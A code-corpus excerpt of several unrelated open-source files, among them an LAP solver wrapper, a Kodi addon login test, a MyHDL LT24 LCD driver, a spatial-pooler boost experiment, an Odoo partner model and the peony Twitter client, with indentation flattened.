indices = np.array((range(costs.shape[0]), r[0]), dtype=np.int64).T
indices = indices[indices[:, 1] != -1]
return indices[:,0], indices[:,1]
def init_standard_solvers():
import importlib
from importlib import util
global available_solvers, default_solver, solver_map
solvers = [
('lapsolver', lsa_solve_lapsolver),
('lap', lsa_solve_lapjv),
('scipy', lsa_solve_scipy),
('munkres', lsa_solve_munkres),
('ortools', lsa_solve_ortools),
]
solver_map = dict(solvers)
available_solvers = [s[0] for s in solvers if importlib.util.find_spec(s[0]) is not None]
if len(available_solvers) == 0:
import warnings
default_solver = None
warnings.warn('No standard LAP solvers found. Consider `pip install lapsolver` or `pip install scipy`', category=RuntimeWarning)
else:
default_solver = available_solvers[0]
init_standard_solvers()
from contextlib import contextmanager
@contextmanager
def set_default_solver(newsolver):
'''Change the default solver within context.
Intended usage
costs = ...
mysolver = lambda x: ... # solver code that returns pairings
with lap.set_default_solver(mysolver):
rids, cids = lap.linear_sum_assignment(costs)
Params
------
newsolver : callable or str
new solver function
'''
global default_solver
oldsolver = default_solver
try:
default_solver = newsolver
yield
finally:
default_solver = oldsolver
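# Minimal usage sketch (added for illustration, assuming at least one of the
# optional solver packages above -- e.g. scipy -- is installed):
#
#     import numpy as np
#     costs = np.array([[1.0, 2.0], [2.0, 1.0]])
#     rids, cids = linear_sum_assignment(costs)      # uses default_solver
#     with set_default_solver('scipy'):
#         rids, cids = linear_sum_assignment(costs)  # forces scipy here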
| apache-2.0 | -6,842,815,007,946,274,000 | 29.044554 | 136 | 0.628604 | false | 3.750927 | false | false | false |
pietje666/plugin.video.vrt.nu | tests/test_tokenresolver.py | 1 | 2324 | # -*- coding: utf-8 -*-
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""Unit tests for TokenResolver functionality"""
# pylint: disable=invalid-name
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from tokenresolver import TokenResolver
xbmc = __import__('xbmc')
xbmcaddon = __import__('xbmcaddon')
xbmcgui = __import__('xbmcgui')
xbmcplugin = __import__('xbmcplugin')
xbmcvfs = __import__('xbmcvfs')
addon = xbmcaddon.Addon()
class TestTokenResolver(unittest.TestCase):
"""TestCase class"""
_tokenresolver = TokenResolver()
username = None
password = None
def setUp(self):
"""Build up function for TestCase class"""
# Save password
self.username = addon.settings['username']
self.password = addon.settings['password']
def tearDown(self):
"""Clean up function for TestCase class"""
# Restore password
addon.settings['username'] = self.username
addon.settings['password'] = self.password
def test_refresh_login(self):
"""Test refreshing login"""
self._tokenresolver.refresh_login()
def test_cleanup_userdata(self):
"""Test cleaning up userdata"""
self._tokenresolver.cleanup_userdata()
def test_successful_login(self):
"""Test successful login"""
self.username = addon.settings['username']
self.password = addon.settings['password']
self._tokenresolver.login(refresh=False)
def test_invalid_login(self):
"""Test invalid login"""
addon.settings['username'] = 'foo'
addon.settings['password'] = 'bar'
self._tokenresolver.login(refresh=False)
def test_missing_username(self):
"""Test missing username"""
addon.settings['username'] = ''
addon.settings['password'] = self.password
self._tokenresolver.login(refresh=True)
self._tokenresolver.login(refresh=False)
def test_missing_password(self):
"""Test missing password"""
addon.settings['username'] = self.username
addon.settings['password'] = ''
self._tokenresolver.login(refresh=True)
self._tokenresolver.login(refresh=False)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 8,739,727,042,616,047,000 | 29.986667 | 91 | 0.645009 | false | 4.157424 | true | false | false |
NickShaffner/rhea | rhea/cores/video/lcd/lt24lcd.py | 2 | 6910 | """
This module contains a video driver for the terasic LT24
LCD display ...
"""
from __future__ import division
import myhdl
from myhdl import Signal, intbv, enum, always_seq, concat
from .lt24intf import LT24Interface
from .lt24lcd_init_sequence import init_sequence, build_init_rom
from .lt24lcd_driver import lt24lcd_driver
@myhdl.block
def lt24lcd(glbl, vmem, lcd):
""" A video display driver for the terasic LT24 LCD display.
This driver reads pixels from the VideoMemory interface and transfers
them to the LT24 display. This hardware module (component) will also
perform the initial display configuration.
(arguments == ports)
Arguments:
glbl (Global): global signals, clock, reset, enable, etc.
vmem (VideoMemory): video memory interface, the driver will read
pixels from this interface.
lcd (LT24Interface): The external LT24 interface.
Parameters:
None
RGB 5-6-5 (8080-system 16bit parallel bus)
"""
assert isinstance(lcd, LT24Interface)
resolution, refresh_rate = (240, 320), 60
number_of_pixels = resolution[0] * resolution[1]
# local references to signals in interfaces
clock, reset = glbl.clock, glbl.reset
# make sure the user timer is configured
assert glbl.tick_user is not None
# write out a new VMEM to the LCD display, a write cycle
# consists of putting the video data on the bus and latching
# with the `wrx` signal. Init (write once) the column and
# page addresses (cmd = 2A, 2B) then write mem (2C)
states = enum(
'init_wait_reset', # wait for the controller to reset the LCD
'init_start', # start the display init sequence
        'init_start_cmd',          # send a command, part of the display seq
'init_next', # determine if another command
'write_cmd_start', # command subroutine
'write_cmd', # command subroutine
'display_update_start', # update the display
'display_update_start_p', # delay for command ack
'display_update', # update the display
'display_update_next', # wait for driver to ack pixel xfered
'display_update_end' # end of display update
)
state = Signal(states.init_wait_reset)
state_prev = Signal(states.init_wait_reset)
cmd = Signal(intbv(0)[8:])
return_state = Signal(states.init_wait_reset)
num_hor_pxl, num_ver_pxl = resolution
print("resolution {}x{} = {} number of pixes".format(
num_hor_pxl, num_ver_pxl, number_of_pixels))
hcnt = intbv(0, min=0, max=num_hor_pxl)
vcnt = intbv(0, min=0, max=num_ver_pxl)
# signals to start a new command transaction to the LCD
datalen = Signal(intbv(0, min=0, max=number_of_pixels+1))
data = Signal(intbv(0)[16:])
datasent = Signal(bool(0))
datalast = Signal(bool(0))
cmd_in_progress = Signal(bool(0))
# --------------------------------------------------------
# LCD driver
gdrv = lt24lcd_driver(glbl, lcd, cmd, datalen, data,
datasent, datalast, cmd_in_progress)
# --------------------------------------------------------
    # build the display init sequence ROM
rom, romlen, maxpause = build_init_rom(init_sequence)
offset = Signal(intbv(0, min=0, max=romlen+1))
pause = Signal(intbv(0, min=0, max=maxpause+1))
# --------------------------------------------------------
# state-machine
@always_seq(clock.posedge, reset=reset)
def beh_state_machine():
state_prev.next = state
if state == states.init_wait_reset:
if lcd.reset_complete:
state.next = states.init_start
elif state == states.init_start:
v = rom[offset]
# @todo: change the table to only contain the number of
# bytes to be transferred
datalen.next = v - 3
p = rom[offset+1]
pause.next = p
offset.next = offset + 2
state.next = states.init_start_cmd
elif state == states.init_start_cmd:
v = rom[offset]
cmd.next = v
if datalen > 0:
v = rom[offset+1]
data.next = v
offset.next = offset + 2
else:
offset.next = offset + 1
state.next = states.write_cmd_start
return_state.next = states.init_next
elif state == states.init_next:
if pause == 0:
if offset == romlen:
state.next = states.display_update_start
else:
state.next = states.init_start
elif glbl.tick_ms:
pause.next = pause - 1
elif state == states.write_cmd_start:
state.next = states.write_cmd
elif state == states.write_cmd:
if cmd_in_progress:
if datasent and not datalast:
v = rom[offset]
data.next = v
offset.next = offset+1
else:
cmd.next = 0
state.next = return_state
elif state == states.display_update_start:
if glbl.tick_user:
cmd.next = 0x2C
state.next = states.display_update_start_p
datalen.next = number_of_pixels
elif state == states.display_update_start_p:
            state.next = states.display_update
elif state == states.display_update:
assert cmd_in_progress
if vcnt == num_ver_pxl-1:
hcnt[:] = 0
vcnt[:] = 0
elif hcnt == num_hor_pxl-1:
hcnt[:] = 0
vcnt[:] = vcnt + 1
else:
hcnt[:] = hcnt + 1
# this will be the pixel for the next write cycle
vmem.hpxl.next = hcnt
vmem.vpxl.next = vcnt
# this is the pixel for the current write cycle
if hcnt == 0 and vcnt == 0:
cmd.next = 0
state.next = states.display_update_end
else:
data.next = concat(vmem.red, vmem.green, vmem.blue)
state.next = states.display_update_next
elif state == states.display_update_next:
if cmd_in_progress:
if datasent and not datalast:
state.next = states.display_update
else:
cmd.next = 0
state.next = states.display_update_end
elif state == states.display_update_end:
# wait till the driver ack the command completion
if not cmd_in_progress:
state.next = states.display_update_start
return myhdl.instances()
| mit | -2,334,838,913,955,180,000 | 34.255102 | 76 | 0.544573 | false | 3.987305 | false | false | false |
openeventdata/UniversalPetrarch | UniversalPetrarch/tests/test_json_pipeline.py | 1 | 1501 | import sys
sys.path.append('..')
import datetime
from bson.objectid import ObjectId
import petrarch_ud
import PETRreader
formatted = [{u'language': u'english',
u'title': u'6 killed in attacks in Iraqi capital Friday',
u'url': u'http://www.menafn.com/1094827896/6-killed-in-attacks-in-Iraqi-capital-Friday?src=RSS',
u'stanford': 1,
u'content': "Ukraine ratified a sweeping agreement with the European Union on Tuesday.",
u'source': u'menafn_iraq',
u'parsed_sents': ["""1 Ukraine Ukraine PROPN NNP Number=Sing 2 nsubj _ _
2 ratified ratify VERB VBD Mood=Ind|Tense=Past|VerbForm=Fin 0 root _ _
3 a a DET DT Definite=Ind|PronType=Art 5 det _ _
4 sweeping sweeping ADJ JJ Degree=Pos 5 amod _ _
5 agreement agreement NOUN NN Number=Sing 2 dobj _ _
6 with with ADP IN _ 9 case _ _
7 the the DET DT Definite=Def|PronType=Art 9 det _ _
8 European european PROPN NNP Number=Sing 9 compound _ _
9 Union Union PROPN NNP Number=Sing 5 nmod _ _
10 on on ADP IN _ 11 case _ _
11 Tuesday Tuesday PROPN NNP Number=Sing 2 nmod _ _
12 . . PUNCT . _ 2 punct _ _"""],
u'date': u'160626',
u'date_added': datetime.datetime(2016, 6, 26, 19, 0, 17, 640000),
u'_id': ObjectId('57702641172ab87eb7dc98fa')}]
def test_petr_formatted_to_results():
petr_ud_results = petrarch_ud.run_pipeline(formatted, write_output=False,
parsed=True)
print(petr_ud_results)
#assert petr_ud_results == correct1_results
if __name__ == "__main__":
test_petr_formatted_to_results()
| mit | 6,506,500,882,239,670,000 | 38.5 | 96 | 0.688874 | false | 2.267372 | false | false | false |
nicolasdespres/hunittest | hunittest/utils.py | 1 | 1667 | # -*- encoding: utf-8 -*-
"""Utility routines
"""
import os
import re
from enum import Enum
from contextlib import contextmanager
import sys
from io import StringIO
def pyname_join(seq):
return ".".join(seq)
def is_pkgdir(dirpath):
return os.path.isdir(dirpath) \
and os.path.isfile(os.path.join(dirpath, "__init__.py"))
def drop_pyext(pathname):
return re.sub(r"\.py$", "", pathname)
def mod_split(modname):
mo = re.match(r"^(.+)\.(.*)$", modname)
if not mo:
raise ValueError("invalid python path identifier")
return (mo.group(1), mo.group(2))
def is_empty_generator(generator):
try:
next(generator)
except StopIteration:
return True
else:
return False
class AutoEnum(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def mkdir_p(path):
try:
os.makedirs(path)
except FileExistsError:
pass
@contextmanager
def protect_cwd(dirpath=None):
saved_cwd = os.getcwd()
if dirpath is not None:
os.chdir(dirpath)
try:
yield
finally:
os.chdir(saved_cwd)
def safe_getcwd():
try:
return os.getcwd()
except FileNotFoundError:
return None
@contextmanager
def silent_stderr():
old_stderr = sys.stderr
sys.stderr = StringIO()
try:
yield
finally:
sys.stderr = old_stderr
def ensure_trailing_slash(path):
if not path.endswith("/"):
return path + "/"
return path
def issubdir(filepath, dirpath):
return filepath.startswith(ensure_trailing_slash(dirpath))
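# Usage sketch (illustrative only, not part of the original module):
#
#     with protect_cwd('/tmp'):          # cwd is '/tmp' inside the block
#         ...                            # and restored on exit
#     issubdir('/a/b/c.py', '/a/b')      # -> True
#     pyname_join(['pkg', 'mod'])        # -> 'pkg.mod'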
| bsd-2-clause | 11,221,398,954,023,508 | 19.329268 | 64 | 0.612478 | false | 3.696231 | false | false | false |
tehtechguy/mHTM | dev/sp_math_pub/boost_experiment.py | 1 | 11796 | # boost_experiment.py
#
# Author : James Mnatzaganian
# Contact : http://techtorials.me
# Organization : NanoComputing Research Lab - Rochester Institute of
# Technology
# Website : https://www.rit.edu/kgcoe/nanolab/
# Date Created : 10/13/15
#
# Description : Study the boost.
# Python Version : 2.7.X
#
# License : MIT License http://opensource.org/licenses/mit-license.php
# Copyright : (c) 2016 James Mnatzaganian
"""
Study the boost.
G{packagetree mHTM}
"""
__docformat__ = 'epytext'
# Native imports
import cPickle, random, csv, os, time, json
# Third party imports
import numpy as np
import bottleneck as bn
import matplotlib.pyplot as plt
from joblib import Parallel, delayed
# Program imports
from mHTM.region import SPRegion
from mHTM.plot import plot_error, compute_err
def make_data(p, nitems=100, width=100, density=0.9, seed=123456789):
"""
Make the dataset.
@param p: the full path to where the dataset should be created.
@param nitems: The number of items to create.
@param width: The size of the input.
@param density: The percentage of active bits.
@param seed: The random number seed.
"""
# Initialization
random.seed(seed)
np.random.seed(seed)
nactive = int(width * density)
# Build the dataset
ds = np.zeros((nitems, width), dtype='bool')
for i in xrange(nitems):
indexes = set(np.random.randint(0, width, nactive))
while len(indexes) != nactive:
indexes.add(random.randint(0, width - 1))
ds[i][list(indexes)] = True
# Write the file
with open(p, 'wb') as f:
cPickle.dump(ds, f, cPickle.HIGHEST_PROTOCOL)
def load_data(p):
"""
Get the dataset.
@param p: the full path to the dataset.
"""
with open(p, 'rb') as f:
ds = cPickle.load(f)
return ds
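# Example (illustration only): build a small dataset of 10 SDRs, each 100 bits
# wide with 90% of the bits active, then read it back:
#
#     make_data('data.pkl', nitems=10, width=100, density=0.9)
#     ds = load_data('data.pkl')   # boolean array of shape (10, 100)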
def _phase3(self):
"""
Normal phase 3, but with tracking the boost changes. Double commented lines
are new.
"""
# Update permanences
self.p = np.clip(self.p + (self.c_pupdate * self.y[:, 0:1] *
self.x[self.syn_map] - self.pdec * self.y[:, 0:1]), 0, 1)
if self.disable_boost is False:
# Update the boosting mechanisms
if self.global_inhibition:
min_dc = np.zeros(self.ncolumns)
min_dc.fill(self.c_mdc * bn.nanmax(self.active_dc))
else:
min_dc = self.c_mdc * bn.nanmax(self.neighbors * self.active_dc, 1)
## Save pre-overlap boost info
boost = list(self.boost)
# Update boost
self._update_active_duty_cycle()
self._update_boost(min_dc)
self._update_overlap_duty_cycle()
## Write out overlap boost changes
with open(os.path.join(self.out_path, 'overlap_boost.csv'), 'ab') as f:
writer = csv.writer(f)
writer.writerow([self.iter, bn.nanmean(boost != self.boost)])
# Boost permanences
mask = self.overlap_dc < min_dc
mask.resize(self.ncolumns, 1)
self.p = np.clip(self.p + self.c_sboost * mask, 0, 1)
## Write out permanence boost info
with open(os.path.join(self.out_path, 'permanence_boost.csv'), 'ab') \
as f:
writer = csv.writer(f)
writer.writerow([self.iter, bn.nanmean(mask)])
# Trim synapses
if self.trim is not False:
self.p[self.p < self.trim] = 0
def main(ds, p, ncols=2048, duty_cycle=100, nepochs=10, global_inhibition=True,
seed=123456789):
"""
Run an experiment.
@param ds: The dataset.
@param p: The full path to the directory to save the results.
@param ncols: The number of columns.
@param duty_cycle: The duty cycle.
@param nepochs: The number of epochs
@param global_inhibition: If True use global inhibition otherwise use local
inhibition.
@param seed: The random seed.
"""
# Get some parameters
ninputs = ds.shape[1]
density = np.sum(ds[0]) / float(ninputs)
# Make the directory if it doesn't exist
try:
os.makedirs(p)
except OSError:
pass
# Initializations
np.random.seed(seed)
kargs = {
'ninputs': ninputs,
'ncolumns': ncols,
'nsynapses': 40,
'random_permanence': True,
'pinc':0.03, 'pdec':0.05,
'seg_th': 15,
'nactive': int(0.02 * ncols),
'duty_cycle': duty_cycle,
'max_boost': 10,
'global_inhibition': global_inhibition,
'trim': 1e-4
}
# Create the region
delattr(SPRegion, '_phase3')
setattr(SPRegion, '_phase3', _phase3)
sp = SPRegion(**kargs)
sp.iter, sp.out_path = 1, p
# Train the region
t = time.time()
for i in xrange(nepochs):
for j, x in enumerate(ds):
sp.execute(x)
sp.iter += 1
t = time.time() - t
# Dump the details
kargs['density'] = density
kargs['seed'] = seed
kargs['nepochs'] = nepochs
kargs['time'] = t
with open(os.path.join(p, 'details.json'), 'wb') as f:
f.write(json.dumps(kargs, sort_keys=True, indent=4,
separators=(',', ': ')))
def vary_density(bp, global_inhibition=True):
"""
Vary the density level.
    @param bp: The base path.
@param global_inhibition: If True use global inhibition otherwise use local
inhibition.
"""
# density_levels = np.arange(1, 100, 1)
density_levels = np.arange(28, 100, 1)
for density in density_levels:
print density
p = os.path.join(bp, str(density))
p2 = os.path.join(p, 'data.pkl')
try:
os.makedirs(p)
except OSError:
pass
make_data(p2, density=density/100., seed=123456789)
# Repeat for good results
Parallel(n_jobs=-1)(delayed(main)(load_data(p2),
os.path.join(p, str(i)), global_inhibition=global_inhibition,
seed=i) for i in xrange(10))
def vary_dutycycle(bp, ds, global_inhibition=True):
"""
Vary the duty cycles.
    @param bp: The base path.
@param ds: The dataset to use.
@param global_inhibition: If True use global inhibition otherwise use local
inhibition.
"""
duty_cycles = (1, 10, 100, 1000, 10000)
try:
os.makedirs(bp)
except OSError:
pass
for dc in duty_cycles:
print '\n\n\n --------{0}-------- \n\n\n'.format(dc)
p = os.path.join(bp, str(dc))
main(ds, p, duty_cycle=dc, nepochs=1,
global_inhibition=global_inhibition)
def plot_density_results(bp, bp2=None):
"""
Average the results.
@param bp: The base path.
@param bp2: The second base path.
"""
def average(p):
"""
Compute the average activations for each density.
@param p: The path to the file.
@return: The average.
"""
with open(p, 'rb') as f:
reader = csv.reader(f)
data = []
for row in reader:
data.append(float(row[1]))
return np.mean(data) * 100
def get_data(p):
"""
Get the data for a single run.
@param p: The path.
@return: A tuple containing the overlap and permanences.
"""
overlap, permanence = [], []
for d in os.listdir(p):
npath = os.path.join(p, d)
if os.path.isdir(npath):
overlap.append(average(os.path.join(npath,
'overlap_boost.csv')))
permanence.append(average(os.path.join(npath,
'permanence_boost.csv')))
return np.array(overlap), np.array(permanence)
def get_all_data(bp):
"""
Get the data for all runs.
@param bp: The base path.
@return: A tuple containing the sparsity, overlap, and permanences.
"""
overlap, permanence, sparsity = [], [], []
for d in sorted([int(x) for x in os.listdir(bp)]):
sparsity.append((1 - (d / 100.)) * 100)
o, p = get_data(os.path.join(bp, str(d)))
overlap.append(o)
permanence.append(p)
return np.array(sparsity[::-1]), np.array(overlap[::-1]), \
np.array(permanence[::-1])
def make_plot_params(sparsity, overlap, permanence, title=None):
"""
Generate the parameters for the plot.
@param sparsity: The sparsity array.
@param overlap: The overlap array.
@param permanence: The permanence array.
@param title: The title for the plot.
@return: A dictionary with the parameters.
"""
return {'x_series':(sparsity, sparsity),
'y_series':(np.median(overlap, 1), np.median(permanence, 1)),
'series_names':('Overlap Boosting', 'Permanence Boosting'),
'y_errs':(compute_err(overlap), compute_err(permanence)),
'xlim':(0, 100), 'ylim':(0, 45), 'title':title
}
data = get_all_data(bp)
if bp2 is None:
plot_error(**make_plot_params(*data))
else:
# Make main plot
fig = plt.figure(figsize=(21, 20), facecolor='white')
ax = fig.add_subplot(111)
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.spines['right'].set_color('none')
ax.tick_params(labelcolor='w', top='off', bottom='off', left='off',
right='off')
ax.set_xlabel('Sparsity [%]')
ax.set_ylabel('% Columns Boosted')
# Make subplots
ax1 = fig.add_subplot(211)
plot_error(show=False, legend=False, ax=ax1, **make_plot_params(*data,
title='Global Inhibition'))
data2 = get_all_data(bp2)
ax2 = fig.add_subplot(212, sharex=ax1, sharey=ax1)
plot_error(show=False, ax=ax2, **make_plot_params(*data2,
title='Local Inhibition'))
# Save it
# plt.show()
plt.subplots_adjust(bottom=0.15, hspace=0.3)
plt.savefig('boost_sparseness.png', format='png',
facecolor=fig.get_facecolor(), edgecolor='none')
def plot_single_run(bp1, bp2):
"""
Create an error plot for a single run.
@param bp1: The base path for global inhibition results.
@param bp2: The base path for local inhibition results.
"""
def read(p):
"""
Read in the data.
@param p: The path to the file to read.
@return: The results.
"""
with open(p, 'rb') as f:
reader = csv.reader(f)
data = []
for row in reader:
data.append(float(row[1]))
return np.array(data) * 100
def get_data(p):
"""
Get all of the results.
@param p: The directory to obtain the data in.
@return: The results.
"""
permanence = []
for d in os.listdir(p):
npath = os.path.join(p, d)
if os.path.isdir(npath):
permanence.append(read(os.path.join(npath,
'permanence_boost.csv')))
return np.array(permanence)
# Get the data
data = [get_data(bp1)]
data.append(get_data(bp2))
# Build the series
x_series = (np.arange(data[0].shape[1]), )
# Make the main plot
fig = plt.figure(figsize=(21, 20), facecolor='white')
ax = fig.add_subplot(111)
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.spines['right'].set_color('none')
ax.tick_params(labelcolor='w', top='off', bottom='off', left='off',
right='off')
ax.set_xlabel('Iteration')
ax.set_ylabel('% Columns Boosted')
# Make subplots
ax1 = fig.add_subplot(211)
plot_error(show=False, legend=False, ax=ax1, title='Global Inhibition',
x_series=x_series, y_series=(np.median(data[0], 0), ),
y_errs=(compute_err(data[0], axis=0),), xlim=(0, 200), ylim=(0, 100))
ax2 = fig.add_subplot(212, sharex=ax1, sharey=ax1)
plot_error(show=False, ax=ax2, title='Local Inhibition', legend=False,
x_series=x_series, y_series=(np.median(data[1], 0), ),
y_errs=(compute_err(data[1], axis=0),), xlim=(0, 200), ylim=(0, 100))
# Save it
# plt.show()
plt.subplots_adjust(bottom=0.15, hspace=0.3)
plt.savefig('boost_permanence.png', format='png',
facecolor=fig.get_facecolor(), edgecolor='none')
if __name__ == '__main__':
# Params
base_dir = os.path.join(os.path.expanduser('~'), 'scratch')
p1 = os.path.join(base_dir, 'boost_experiments-global-2')
p2 = os.path.join(base_dir, 'boost_experiments-local-2')
# Experiment
vary_density(p1, True)
vary_density(p2, False)
plot_density_results(p1, p2)
density = '26'
plot_single_run(os.path.join(p1, density), os.path.join(p2, density))
| mit | -8,973,424,034,394,797,000 | 24.039735 | 79 | 0.629281 | false | 2.797249 | false | false | false |
CLVsol/clvsol_odoo_addons | clv_patient/models/res_partner.py | 1 | 2990 | # -*- coding: utf-8 -*-
# Copyright 2008 Luis Falcon <[email protected]>
# Copyright 2016 LasLabs Inc.
# License GPL-3.0 or later (http://www.gnu.org/licenses/gpl.html).
from datetime import datetime
from odoo import _, api, fields, models
from odoo.exceptions import ValidationError
class ResPartner(models.Model):
_inherit = 'res.partner'
type = fields.Selection(selection_add=[
('clv.patient', 'Patient'),
])
# alias = fields.Char(
# string='Alias',
# help='Common name that the Partner is referred',
# )
patient_ids = fields.One2many(
string='Related Patients',
comodel_name='clv.patient',
compute='_compute_patient_ids_and_count',
)
count_patients = fields.Integer(
compute='_compute_patient_ids_and_count',
)
# birthdate_date = fields.Date(
# string='Birthdate',
# )
# gender = fields.Selection([
# ('male', 'Male'),
# ('female', 'Female'),
# ('other', 'Other'),
# ])
# weight = fields.Float()
# weight_uom = fields.Many2one(
# string="Weight UoM",
# comodel_name="product.uom",
# default=lambda s: s.env['res.lang'].default_uom_by_category('Weight'),
# domain=lambda self: [('category_id', '=',
# self.env.ref('product.product_uom_categ_kgm').id)
# ]
# )
@api.multi
def _get_clv_entity(self):
self.ensure_one()
if self.type and self.type[:3] == 'clv':
return self.env[self.type].search([
('partner_id', '=', self.id),
])
@api.multi
def _compute_patient_ids_and_count(self):
for record in self:
patients = self.env['clv.patient'].search([
('partner_id', 'child_of', record.id),
])
record.count_patients = len(patients)
record.patient_ids = [(6, 0, patients.ids)]
# @api.multi
# @api.constrains('birthdate_date')
# def _check_birthdate_date(self):
# """ It will not allow birthdates in the future. """
# now = datetime.now()
# for record in self:
# if not record.birthdate_date:
# continue
# birthdate = fields.Datetime.from_string(record.birthdate_date)
# if birthdate > now:
# raise ValidationError(_(
# 'Partners cannot be born in the future.',
# ))
@api.model
def create(self, vals):
""" It overrides create to bind appropriate clv entity. """
if all((
vals.get('type', '').startswith('clv.'),
not self.env.context.get('clv_entity_no_create'),
)):
model = self.env[vals['type']].with_context(
clv_entity_no_create=True,
)
clv_entity = model.create(vals)
return clv_entity.partner_id
return super().create(vals)
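    # Illustrative note (not part of the original module): with the override
    # above, creating a partner whose ``type`` starts with 'clv.' is routed
    # through the matching clv entity, e.g. a hypothetical call such as
    #     self.env['res.partner'].create({'name': 'John', 'type': 'clv.patient'})
    # creates a clv.patient record and returns its partner_id instead.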
| agpl-3.0 | 1,173,964,329,214,253,600 | 32.222222 | 81 | 0.53913 | false | 3.63747 | false | false | false |
odrling/peony-twitter | peony/client.py | 1 | 21586 | # -*- coding: utf-8 -*-
"""
Peony Clients
:class:`BasePeonyClient` only handles requests while
:class:`PeonyClient` adds some methods that could help when using
the Twitter APIs, with a method to upload a media
"""
import asyncio
import io
from contextlib import suppress
import logging
try:
from asyncio.exceptions import CancelledError
except ImportError: # pragma: no cover
from concurrent.futures import CancelledError
from urllib.parse import urlparse
import aiohttp
from . import data_processing, exceptions, general, oauth, utils
from .api import APIPath, StreamingAPIPath
from .commands import EventStreams, task
from .exceptions import PeonyUnavailableMethod
from .oauth import OAuth1Headers
from .stream import StreamResponse
logger = logging.getLogger(__name__)
class MetaPeonyClient(type):
def __new__(cls, name, bases, attrs, **kwargs):
""" put the :class:`~peony.commands.tasks.Task`s in the right place """
tasks = {'tasks': set()}
for base in bases:
if hasattr(base, '_tasks'):
for key, value in base._tasks.items():
tasks[key] |= value
for attr in attrs.values():
if isinstance(attr, task):
tasks['tasks'].add(attr)
attrs['_tasks'] = tasks
attrs['_streams'] = EventStreams()
return super().__new__(cls, name, bases, attrs)
class BasePeonyClient(metaclass=MetaPeonyClient):
"""
Access the Twitter API easily
You can create tasks by decorating a function from a child
class with :class:`peony.task`
    You can also attach an :class:`EventStream` to a subclass using
    the :func:`event_stream` decorator of the subclass
After creating an instance of the child class you will be able
to run all the tasks easily by executing :func:`get_tasks`
Parameters
----------
streaming_apis : iterable, optional
Iterable containing the streaming APIs subdomains
base_url : str, optional
Format of the url for all the requests
api_version : str, optional
Default API version
suffix : str, optional
Default suffix of API endpoints
loads : function, optional
Function used to load JSON data
error_handler : function, optional
Requests decorator
session : aiohttp.ClientSession, optional
Session to use to make requests
proxy : str
Proxy used with every request
compression : bool, optional
Activate data compression on every requests, defaults to True
user_agent : str, optional
Set a custom user agent header
encoding : str, optional
text encoding of the response from the server
loop : event loop, optional
An event loop, if not specified :func:`asyncio.get_event_loop`
is called
"""
def __init__(self,
consumer_key=None,
consumer_secret=None,
access_token=None,
access_token_secret=None,
bearer_token=None,
auth=None,
headers=None,
streaming_apis=None,
base_url=None,
api_version=None,
suffix='.json',
loads=data_processing.loads,
error_handler=utils.DefaultErrorHandler,
session=None,
proxy=None,
compression=True,
user_agent=None,
encoding=None,
loop=None,
**kwargs):
if streaming_apis is None:
self.streaming_apis = general.streaming_apis
else:
self.streaming_apis = streaming_apis
if base_url is None:
self.base_url = general.twitter_base_api_url
else:
self.base_url = base_url
if api_version is None:
self.api_version = general.twitter_api_version
else:
self.api_version = api_version
if auth is None:
auth = OAuth1Headers
self.proxy = proxy
self._suffix = suffix
self.error_handler = error_handler
self.encoding = encoding
if encoding is not None:
def _loads(*args, **kwargs):
return loads(*args, encoding=encoding, **kwargs)
self._loads = _loads
else:
self._loads = loads
self.loop = asyncio.get_event_loop() if loop is None else loop
self._session = session
self._user_session = session is not None
self._gathered_tasks = None
if consumer_key is None or consumer_secret is None:
raise TypeError("missing 2 required arguments: 'consumer_key' "
"and 'consumer_secret'")
# all the possible args required by headers in :mod:`peony.oauth`
kwargs = {
'consumer_key': consumer_key,
'consumer_secret': consumer_secret,
'access_token': access_token,
'access_token_secret': access_token_secret,
'bearer_token': bearer_token,
'compression': compression,
'user_agent': user_agent,
'headers': headers,
'client': self
}
# get the args needed by the auth parameter on initialization
args = utils.get_args(auth.__init__, skip=1)
# keep only the arguments required by auth on init
kwargs = {key: value for key, value in kwargs.items()
if key in args}
self.headers = auth(**kwargs)
self.setup = self.loop.create_task(self._setup())
async def _setup(self):
if self._session is None:
logger.debug("Creating session")
self._session = aiohttp.ClientSession()
@staticmethod
def _get_base_url(base_url, api, version):
"""
create the base url for the api
Parameters
----------
base_url : str
format of the base_url using {api} and {version}
api : str
name of the api to use
version : str
version of the api
Returns
-------
str
the base url of the api you want to use
"""
format_args = {}
if "{api}" in base_url:
if api == "":
base_url = base_url.replace('{api}.', '')
else:
format_args['api'] = api
if "{version}" in base_url:
if version == "":
base_url = base_url.replace('/{version}', '')
else:
format_args['version'] = version
return base_url.format(api=api, version=version)
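    # Example (sketch; the format string below is an assumption for
    # illustration, not taken from this file):
    #     _get_base_url("https://{api}.twitter.com/{version}", "api", "1.1")
    # returns "https://api.twitter.com/1.1", while api="" drops the "{api}."
    # part and version="" drops the "/{version}" part.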
def __getitem__(self, values):
"""
Access the api you want
This permits the use of any API you could know about
For most api you only need to type
>>> self[api] # api is the api you want to access
You can specify a custom api version using the syntax
>>> self[api, version] # version is the api version as a str
For more complex requests
>>> self[api, version, suffix, base_url]
Returns
-------
.api.BaseAPIPath
To access an API endpoint
"""
defaults = None, self.api_version, self._suffix, self.base_url
keys = ['api', 'version', 'suffix', 'base_url']
if isinstance(values, dict):
# set values in the right order
values = [values.get(key, defaults[i])
for i, key in enumerate(keys)]
elif isinstance(values, set):
raise TypeError('Cannot use a set to access an api, '
'please use a dict, a tuple or a list instead')
elif isinstance(values, str):
values = [values, *defaults[1:]]
elif isinstance(values, tuple):
if len(values) < len(keys):
padding = (None,) * (len(keys) - len(values))
values += padding
values = [default if value is None else value
for value, default in zip(values, defaults)
if (value, default) != (None, None)]
else:
raise TypeError("Could not create an endpoint from an object of "
"type " + values.__class__.__name__)
api, version, suffix, base_url = values
base_url = self._get_base_url(base_url, api, version)
# use StreamingAPIPath if subdomain is in self.streaming_apis
if api in self.streaming_apis:
return StreamingAPIPath([base_url], suffix=suffix, client=self)
else:
return APIPath([base_url], suffix=suffix, client=self)
__getattr__ = __getitem__
def __del__(self):
if self.loop.is_closed(): # pragma: no cover
pass
elif self.loop.is_running():
self.loop.create_task(self.close())
else:
self.loop.run_until_complete(self.close())
